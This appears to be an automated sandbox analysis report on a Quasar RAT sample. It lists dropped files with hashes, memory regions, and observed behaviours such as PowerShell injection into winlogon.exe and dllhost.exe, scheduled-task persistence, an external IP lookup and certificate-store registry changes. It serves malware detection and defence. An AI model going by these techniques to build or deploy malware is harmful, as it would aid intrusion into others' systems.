| SHA512 | 3c3066fa86be1ddc071f530688b6aabd17381e26c0634c194fabe337aef8451895636b05aab5289bb43116ff766ad003f9b6d7113c29fab5e9f684245a602f4d |
C:\Users\Admin\AppData\Roaming\startup_str_80.bat
| MD5 | f6d5bfaee8a55ff72c7b453fda066d62 |
| SHA1 | 7d737d53013990e5d05076b7206e43eb4793fc7f |
| SHA256 | 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308 |
| SHA512 | e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284 |
memory/4304-205-0x000000000A830000-0x000000000A89C000-memory.dmp
memory/4304-206-0x000000000A960000-0x000000000A9F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\New.exe
| MD5 | cf570b21f42f0ce411b7c9961068931e |
| SHA1 | f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d |
| SHA256 | d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234 |
| SHA512 | de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684 |
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b51552b77057c2405f73bbbf9c89234a |
| SHA1 | 4793adbba023f90d2d2ad0ec55199c56de815224 |
| SHA256 | 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0 |
| SHA512 | 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66 |
memory/2644-223-0x0000000000750000-0x00000000007BC000-memory.dmp
memory/752-225-0x0000000073150000-0x000000007383E000-memory.dmp
memory/4304-226-0x0000000006EC0000-0x0000000006ED2000-memory.dmp
memory/212-231-0x000001F2DB7C0000-0x000001F2DB7E2000-memory.dmp
memory/212-234-0x000001F2F3D30000-0x000001F2F3DA6000-memory.dmp
memory/4304-235-0x00000000093E0000-0x000000000941E000-memory.dmp
memory/4304-243-0x0000000009490000-0x000000000949A000-memory.dmp
memory/212-263-0x000001F2F3CC0000-0x000001F2F3CEA000-memory.dmp
memory/212-264-0x00007FFE4AA30000-0x00007FFE4AC0B000-memory.dmp
memory/212-265-0x00007FFE49E40000-0x00007FFE49EEE000-memory.dmp
memory/2496-269-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2496-268-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2496-267-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2496-266-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2496-271-0x0000000140000000-0x0000000140008000-memory.dmp
memory/2496-275-0x00007FFE4AA30000-0x00007FFE4AC0B000-memory.dmp
memory/2496-276-0x00007FFE49E40000-0x00007FFE49EEE000-memory.dmp
memory/584-281-0x000001DD6DAC0000-0x000001DD6DAEA000-memory.dmp
memory/584-280-0x000001DD6DA90000-0x000001DD6DAB5000-memory.dmp
memory/2496-277-0x0000000140000000-0x0000000140008000-memory.dmp
memory/584-288-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
memory/636-298-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
memory/992-328-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
memory/992-327-0x0000027F13D60000-0x0000027F13D8A000-memory.dmp
memory/992-322-0x0000027F13D60000-0x0000027F13D8A000-memory.dmp
memory/900-318-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
memory/900-317-0x000002D90C250000-0x000002D90C27A000-memory.dmp
memory/900-312-0x000002D90C250000-0x000002D90C27A000-memory.dmp
memory/744-308-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
memory/744-307-0x0000023564000000-0x000002356402A000-memory.dmp
memory/744-302-0x0000023564000000-0x000002356402A000-memory.dmp
memory/636-297-0x00000237BE0C0000-0x00000237BE0EA000-memory.dmp
memory/636-292-0x00000237BE0C0000-0x00000237BE0EA000-memory.dmp
memory/584-283-0x000001DD6DAC0000-0x000001DD6DAEA000-memory.dmp
memory/584-287-0x000001DD6DAC0000-0x000001DD6DAEA000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
| MD5 | 21434a6e0879ba69a3d5695caeb379f2 |
| SHA1 | dc3a820d6c76ee3c64fb6213a31f994c134ae2eb |
| SHA256 | d80f9678371be63e696eec0d984fdb535f3594b4c0d83bb8ad4bdceb9606e133 |
| SHA512 | 25a63ccc05e549490cbeeebc8f87123d13b34011c787b7d7553dbb5a08e77a2732728f4816c02b971bd52c3503f47f93fc504c4ff3acae311bb3281c5c733c5a |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-28 13:42
Reported
2024-05-28 13:47
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
279s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 544 created 604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk | C:\Windows\system32\DllHost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 544 set thread context of 4148 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86d0a152-43d0-4144 = 4a43152405b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86d0a152-43d0-4144 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\816de696-adc4-4ded = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9df793d3-2b92-4650 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d34842b-5822-44c2 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5845b22a-cd5c-4a60 = 2fb7d42405b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25277d3b-31b4-4eaa = "\\\\?\\Volume{8A2AD7B7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\48bc7b06ea8322cd6af81d6a4508f3373b9b8b813bc998d6a224ceabe13c9f9a" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\816de696-adc4-4ded | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15b190d0-8256-458d = cfe90f2405b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d34842b-5822-44c2 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5845b22a-cd5c-4a60 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5845b22a-cd5c-4a60 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25277d3b-31b4-4eaa | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\816de696-adc4-4ded | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
